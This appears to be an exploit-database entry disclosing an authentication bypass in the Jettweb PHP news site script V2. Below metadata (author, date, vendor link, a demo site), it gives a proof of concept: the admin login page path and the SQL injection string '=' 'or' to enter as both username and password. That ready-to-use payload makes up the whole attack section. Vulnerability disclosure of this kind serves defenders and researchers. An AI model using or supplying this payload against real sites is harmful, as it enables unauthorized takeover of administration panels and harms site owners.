Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)

Author: Ahmet Ümit BAYRAM
type: webapps
platform: php
port: 80.0
date_added: 2019-03-25  
date_updated: 2019-03-25  
verified: 1  
codes:   
tags: SQL Injection (SQLi)  
aliases:   
screenshot_url:   
application_url:   

raw file: 46598.txt  

# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'